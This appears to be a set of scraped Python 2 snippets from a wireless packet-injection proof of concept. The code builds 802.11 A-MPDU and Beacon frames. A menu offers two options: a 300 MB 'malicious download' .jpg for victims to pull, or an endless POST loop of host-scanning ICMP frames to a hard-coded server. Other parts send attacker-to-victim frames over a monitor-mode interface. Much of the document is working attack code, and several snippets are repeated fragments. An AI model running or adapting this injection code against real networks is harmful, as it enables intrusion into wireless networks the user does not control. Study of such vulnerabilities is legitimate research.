Example #1
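    def get_entry(self, client_ip):
        """Look up *client_ip* in the ARP table while holding the instance mutex.

        Args:
            client_ip: key into ``self.arp_table``.

        Returns:
            The stored entry, or ``None`` (after a WARNING log line) when the
            address is not in the table.
        """
        self.mutex.acquire()
        try:
            return self.arp_table[client_ip]
        except KeyError:
            printd("Could not find IP %s in ARP table." % client_ip, Level.WARNING)
            return None
        finally:
            # Released in ``finally`` so an exception raised by the logging
            # call (or anything else) cannot leave the mutex held forever.
            self.mutex.release()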
Example #2
    def get(self, key, default=None):
        """Return option *key* from the ``fakeap`` section, or *default*.

        A missing option is logged at WARNING and *default* is returned; the
        resolved ``key -> value`` pair is then always logged at INFO.  A missing
        ``fakeap`` section is not handled here (ConfigParser raises
        NoSectionError).

        NOTE(review): the INFO line prints the value verbatim, so keep secrets
        out of this section or lower that log level — confirm against what the
        config file can hold.
        """
        try:
            value = ConfigParser.get(self, 'fakeap', key)
        except NoOptionError as err:
            printd("Option '%s' not specified in config file. Using default." % err.option, Level.WARNING)
            value = default

        printd("%s -> %s" % (key, value), Level.INFO)
        return value
Example #3
    def get(self, key, default=None):
        """Fetch *key* from the ``fakeap`` config section, falling back to *default*.

        Only NoOptionError is handled (logged at WARNING); a missing section
        propagates as NoSectionError from ConfigParser.  Every lookup result is
        echoed at INFO, value included — NOTE(review): avoid storing secrets in
        this section unless that log line is acceptable.
        """
        value = default
        try:
            value = ConfigParser.get(self, 'fakeap', key)
        except NoOptionError as err:
            printd(
                "Option '%s' not specified in config file. Using default." %
                err.option, Level.WARNING)

        printd("%s -> %s" % (key, value), Level.INFO)
        return value
Example #4
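def main_download():
    """Build the "pull" PoC file from 256 serialised Beacon-frame containers.

    Asks for confirmation first (the prompt says the result is a ~300 MB
    ``download.jpg`` in the working directory — the name and size are decided
    inside ``MaliciousDownload`` / ``ssid_packet``, which are not visible here,
    so confirm there).  The visible calls only build the container and hand it
    to ``MaliciousDownload.write()``; nothing is transmitted by this function.
    """
    raw_input("This will create a 300 MB file download.jpg in the working directory. Press any key to continue or CTRL+C to exit.")
    printd(clr(Color.YELLOW, "Creating malicious download..."), Level.INFO)

    # Containers are (series of) frames to inject into the remote network.
    # Each element is one Beacon-frame container; joining once avoids the
    # quadratic cost of ``+=`` string concatenation over 256 frames.
    container = "".join(str(ssid_packet()) for _ in range(256))

    md = MaliciousDownload(container)
    md.write()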
Example #5
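    def add_msdu(self, msdu, msdu_len=-1):
        """Append *msdu*, its FCS and 4-octet alignment padding to ``self.data``.

        Args:
            msdu: payload placed after the 802.11 header (scapy layer or str).
            msdu_len: length used for the MPDU size computation; ``-1`` (the
                default) means ``len(msdu)``.

        Side effects: prints the MPDU length and any padding bytes to stdout
        (Python 2 ``print`` statements) and flushes it.
        """
        if msdu_len == -1:
            msdu_len = len(msdu)

        # 802.11 header + payload + 4-octet FCS
        mpdu_len = len(self.dot11hdr) + msdu_len + 4
        print 'MPDU length: ', mpdu_len

        remainder = mpdu_len % 4
        if remainder:
            frame_padding = "\x00" * (4 - remainder)  # Align to 4 octets
            printd("Padding added: ", Level.INFO)
            for character in frame_padding:
                print "\\x", character.encode('hex'),
            printd("", Level.INFO)
        else:
            frame_padding = ""
            printd("No padding added", Level.INFO)

        sys.stdout.flush()

        # Frame check sequence over 802.11 header + payload.
        maccrc = dot11crc(str(self.dot11hdr / msdu))

        # ``self.data`` already carries the radiotap and 802.11 headers, so only
        # the payload, FCS and padding are appended.  The A-MPDU delimiter CRC
        # that used to be computed here was never used by this method and has
        # been dropped.
        self.data = self.data / msdu / maccrc / frame_padding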
Example #6
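def main():
    """Build the "push" PoC payload and POST it to the hard-coded host in a loop.

    800 A-MPDU containers, each wrapping one ``ping_packet`` addressed to
    ``192.168.0.N`` (N cycling 1..255, sequence number cycling mod 1024), are
    serialised and joined once.  The result is then POSTed as a multipart file
    field to ``http://10.0.0.6:80/index.html`` in an endless loop, prefixed by
    0-3 NUL bytes chosen at random per request.

    The target URL and the MAC addresses below are hard-coded.  The loop has no
    exit other than KeyboardInterrupt (which ``except Exception`` does not
    catch); connection failures are logged and retried immediately, without
    back-off.
    """
    session = requests.Session()
    seq = 1
    ip_count = 0

    printd(clr(Color.BLUE, "Building container..."), Level.INFO)
    parts = []
    for _ in range(800):
        seq = (seq + 1) % 1024
        ip_count = (ip_count % 255) + 1

        # Ping from attacker --> victim
        # You need to change the MAC addresses and IPs to match the remote AP
        ampdu_pkt = AMPDUPacket('ff:ff:ff:ff:ff:ff', '64:D1:A3:3D:26:5B', '64:D1:A3:3D:26:5B', 0x02)
        ampdu_pkt.add_msdu(ping_packet(seq, "10.0.0.1", "192.168.0." + str(ip_count)))
        ampdu_pkt.add_padding(8)
        parts.append(str(ampdu_pkt))
    # One join instead of ``+=`` per iteration (quadratic over 800 frames).
    container = "".join(parts)
    printd(clr(Color.BLUE, "Finished building container! Sending..."), Level.INFO)

    while 1:
        print("."),
        sys.stdout.flush()
        request_params = {'postpayload': ("\x00" * random.randint(0, 3)) + container}
        try:
            session.post("http://" + "10.0.0.6:80" + "/index.html", files=request_params, timeout=5)
        except requests.exceptions.ConnectionError:
            printd(clr(Color.RED, "Could not connect to host"), Level.CRITICAL)
        except Exception:
            printd(clr(Color.RED, "Another exception"), Level.CRITICAL)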
Example #7
    def add_msdu(self, msdu, msdu_len=-1):
        """Append *msdu* to the A-MPDU as one delimited subframe.

        The subframe is: 4-byte delimiter (little-endian 16-bit word holding
        the MPDU length shifted left by 4, a CRC-8 of that word using
        polynomial 0b100000111 with reflected input and 0xFF xor-out, and the
        signature byte 0x4E), the 802.11 header, the payload, the FCS, and
        NUL padding up to a 4-octet boundary.  ``num_subframes`` is bumped.

        Args:
            msdu: payload (scapy layer or str) placed after the 802.11 header.
            msdu_len: length used for the MPDU size; ``-1`` means ``len(msdu)``.

        Side effects: prints the MPDU length and padding bytes to stdout
        (Python 2 ``print`` statements) and flushes it.  A length that does not
        fit the 12 bits left after the shift cannot be packed into the 16-bit
        field and struct.pack will reject it.
        """
        if msdu_len == -1:
            msdu_len = len(msdu)

        # 802.11 header + payload + 4-octet FCS
        mpdu_len = len(self.dot11hdr) + msdu_len + 4
        print 'MPDU length: ', mpdu_len

        remainder = mpdu_len % 4
        if remainder:
            frame_padding = "\x00" * (4 - remainder)  # Align to 4 octets
            printd("Padding added: ", Level.INFO)
            for character in str(frame_padding):
                print "\\x", character.encode('hex'),
            printd("", Level.INFO)
        else:
            frame_padding = ""
            printd("No padding added", Level.INFO)

        sys.stdout.flush()

        # Delimiter: length field (<<4), CRC-8 over that word, signature.
        length_field = mpdu_len << 4
        crc8 = crcmod.mkCrcFun(0b100000111, rev=True, initCrc=0x00, xorOut=0xFF)
        delimiter_crc = crc8(struct.pack('<H', length_field))
        delim_sig = 0x4E
        ampdu_header = struct.pack('<HBB', length_field, delimiter_crc, delim_sig)

        # FCS over 802.11 header + payload.
        fcs = dot11crc(str(self.dot11hdr / msdu))

        self.data = self.data / ampdu_header / self.dot11hdr / msdu / fcs / frame_padding
        self.num_subframes += 1
Example #8
        print("."),
        sys.stdout.flush()
        request_params = {'postpayload': ("\x00" * random.randint(0, 3)) + str(container)}
        try:
            session.post("http://" + "10.0.0.6:80" + "/index.html", files=request_params, timeout=5)
        except requests.exceptions.ConnectionError:
            printd(clr(Color.RED, "Could not connect to host"), Level.CRITICAL)
            pass
        except Exception:
            printd(clr(Color.RED, "Another exception"), Level.CRITICAL)
            pass

if __name__ == "__main__":
    # Entry point: ask which PoC to run and dispatch on the answer.  Ctrl+C at
    # the prompt or while a PoC is running is reported as a clean exit.
    _pocs = {"1": main_download, "2": main}
    try:
        pocnum = raw_input("Two PoCs are available. Suggested approach to test the vulnerability is to choose option 1"
                           " and upload the file to your web server. Then, download while connected to an _open_ "
                           "network and observe Wireshark output for MAC 00:00:00:00:00:00 in monitor mode. Waving "
                           "your hand over the antenna of the receiver can speed up the injection rate if you don't "
                           "want to wait too long to see the results.\n"
                           "\t1) Generate 300 MB .jpg file containing malicious Beacon frames (pulled by victim).\n"
                           "\t2) Connect to victim web server and POST malicious host scanning ICMP frames (push to victim).\n"
                           "Note: for option 2 you need to change the MAC addresses and IPs in the source to match the remote AP.\n"
                           "Choice: ")
        handler = _pocs.get(pocnum)
        if handler is None:
            printd("Invalid PoC number.", Level.CRITICAL)
        else:
            handler()
    except KeyboardInterrupt:
        printd("\nExiting...", Level.INFO)
Example #9
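 def dump_to_file(self):
     """Write 250 back-to-back copies of this frame to ``ampdu.bin``.

     The file is opened in binary mode: the serialised frame is raw packet
     bytes, and a text-mode handle would translate newline bytes on platforms
     that distinguish the two.  The path is relative to the current working
     directory and an existing file is overwritten.
     """
     with open('ampdu.bin', 'wb') as f:
         printd(clr(Color.YELLOW, "Dumped garbage packet"), Level.INFO)
         f.write(str(self) * 250)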
Example #10
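 def dump_to_file(self):
     """Dump this frame, repeated 250 times, to ``ampdu.bin`` in the cwd.

     Binary mode is used because the payload is raw frame bytes; ``'w'`` would
     apply newline translation on platforms that do so.  Any existing
     ``ampdu.bin`` is silently replaced.
     """
     blob = str(self) * 250
     with open('ampdu.bin', 'wb') as f:
         printd(clr(Color.YELLOW, "Dumped garbage packet"), Level.INFO)
         f.write(blob)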
Example #11
def main():
    """Send ten 802.11 data frames carrying a ``ping_packet``, hexdumping each step.

    Every iteration builds a ``Dot11Packet`` with the hard-coded broadcast
    destination and AP addresses below, attaches one ``ping_packet`` whose
    sequence number cycles mod 1024 and whose target is ``192.168.0.N`` with N
    starting at 2 (``ip_count`` starts at 1 and is bumped before first use),
    dumps radiotap / 802.11 header / MSDU / complete frame to stdout, then
    calls ``pkt.send()`` (monitor-mode interface) and sleeps 100 ms.
    """
    def dump(label, raw):
        # Label line, hexdump of ``raw``, then a flush so the output keeps
        # its order relative to the printd lines.
        printd(clr(Color.YELLOW, label), Level.INFO)
        hexdump.hexdump(str(raw))
        sys.stdout.flush()

    seq = 1
    ip_count = 1

    for _ in range(10):
        seq = (seq + 1) % 1024
        ip_count = (ip_count % 255) + 1
        target = "192.168.0." + str(ip_count)

        # Ping from attacker --> victim
        # You need to change the MAC addresses and IPs to match the remote AP
        pkt = Dot11Packet('ff:ff:ff:ff:ff:ff', '64:D1:A3:3D:26:5B',
                          '64:D1:A3:3D:26:5B')

        dump("Radiotap:", pkt.rt)
        printd("", Level.INFO)  # linefeed

        dump("802.11 hdr:", pkt.dot11hdr)

        # The MSDU is built twice: once to attach, once only to display.
        # NOTE(review): if ping_packet() is deterministic for equal arguments
        # the second build could reuse the first — confirm before changing.
        pkt.add_msdu(ping_packet(seq, "10.0.0.1", target))
        dump("MSDU added:", ping_packet(seq, "10.0.0.1", target))

        dump("Radiotap + 802.11 hdr + MSDU + CRC:", pkt.data)
        printd("", Level.INFO)  # linefeed

        pkt.send()  # the interface has to be in monitor mode
        printd("packet sent", Level.INFO)
        time.sleep(0.1)
Example #12
def main_ampdu():
    # "Requests" Python library: http://docs.python-requests.org/en/master/user/advanced/
    #session = requests.Session()
    count = 1
    ip_count = 0

    printd(clr(Color.BLUE, "Building container..."), Level.INFO)
    """ Build container """
    container = ''
    for i in range(0, 2):
        count = (count + 1) % 1024
        ip_count = (ip_count % 255) + 1

        # Ping from attacker --> victim
        # You need to change the MAC addresses and IPs to match the remote AP
        ampdu_pkt = AMPDUPacket('ff:ff:ff:ff:ff:ff', '64:D1:A3:3D:26:5B',
                                '64:D1:A3:3D:26:5B', 0x02)

        printd(clr(Color.YELLOW, "Radiotap (rt):"), Level.INFO)
        #sys.stdout.flush()
        hexdump.hexdump(str(ampdu_pkt.rt))

        for character in str(ampdu_pkt.rt):
            # this prints "\x 00 \x 00 \x 12 \x 00 \x 2e \x 08 \x 00 \x 00 \x 00 \x 6c \x 6c \x 09 \x c0 \x 00 \x c0 \x 01 \x 00 \x 00 "
            print "\\x", character.encode('hex'),  #does not work in python3
            sys.stdout.flush()
        printd("", Level.INFO)  #print a linefeed

        printd(clr(Color.YELLOW, "dot11hdr:"), Level.INFO)
        #sys.stdout.flush()
        hexdump.hexdump(str(ampdu_pkt.dot11hdr))
        sys.stdout.flush()

        # add an MSDU to the AMPDU
        ampdu_pkt.add_msdu(
            ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count)))
        printd(clr(Color.YELLOW, "AMPDU with the MSDU added:"), Level.INFO)
        #sys.stdout.flush()
        hexdump.hexdump(str(ampdu_pkt))
        sys.stdout.flush()

        ampdu_pkt.add_padding(8)
        printd(
            clr(Color.YELLOW,
                "AMPDU with MSDU and 8 padding delimiters added:"), Level.INFO)
        #sys.stdout.flush()
        hexdump.hexdump(str(ampdu_pkt))
        sys.stdout.flush()

        container += str(ampdu_pkt)

        # Beacon from attacker --> victim
        #ampdu_pkt = ssid_packet()
        #container += str(ampdu_pkt)

        # Ping from victim --> access point
        #ampdu_pkt = AMPDUPacket('4C:5E:0C:9E:82:19', 'f8:1a:67:1b:14:00', '4C:5E:0C:9E:82:19')
        #ampdu_pkt.add_msdu(ping_packet(count, "192.168.88.254", "10.0.0." + str(ip_count)))
        #ampdu_pkt.add_padding(8)
        #container += str(ampdu_pkt)
    """ end package """
    printd(clr(Color.BLUE, "Final A-MPDU built:"), Level.INFO)
    sys.stdout.flush()

    #hexdump.hexdump('\x00'*16)
    #hexdump.hexdump("Hello world")
    hexdump.hexdump(container)
    sys.stdout.flush()

    for character in container:
        # this prints "\x 80 \x 04 \x bb \x 4e \x 88 \x 02 \x 00 \x 00 \x ff \x ff \x ff \x ff \x ff \x ff \x 64 "
        print "\\x", character.encode('hex'),  #does not work in python3
        #print character, character.encode('hex'),

    printd("", Level.INFO)  #print a linefeed

    # send the packet a number of times
    for i in range(0, 10):
        # send the packet
        ampdu_pkt.send()  #the interface has to be in monitor mode
        printd("packet sent", Level.INFO)
        time.sleep(0.1)
    """